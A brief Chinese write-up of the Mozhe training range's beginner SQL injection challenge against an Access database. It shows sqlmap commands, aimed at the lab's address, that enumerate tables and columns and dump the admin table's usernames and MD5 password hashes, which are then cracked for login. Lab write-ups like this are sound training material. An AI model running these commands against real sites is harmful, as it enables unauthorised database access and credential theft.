墨者SQL注入Access(入门) – 作者:可乐kele

1618291695_60752bef97f21145f8903.png!small

1.打开靶场以后,因是SQL注入,所以首先要寻找注入点

图片[2]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科

2.点击维护通知,发现一个新的页面,并且URL处带有id参数

图片[3]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科3.进行手工探测一下,发现报错

图片[4]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科4.放到sqlmap直接进行,但是因为是access,此类是没有数据库的,所以直接探测表即可

图片[5]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科

sqlmap.py-u http://219.153.49.228:40916/new_list.asp?id=1–table图片[6]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科5.探测表中数据

sqlmap.py -u http://219.153.49.228:40916/new_list.asp?id=1 -T admin -columns

图片[7]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科6.探索用户名密码

ssqlmap.py -u http://219.153.49.228:40916/new_list.asp?id=1 -T admin -C username,passwo –dump

图片[8]-墨者SQL注入Access(入门) – 作者:可乐kele-安全小百科7.将获得用户名密码记录,其中密码为MD5加密,需要解密,解密后才可登录

1618292151_60752db78dddc5153baee.png!small

1618292189_60752ddda2ebc8ccae1d1.png!small

来源:freebuf.com 2021-04-13 13:37:14 by: 可乐kele

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论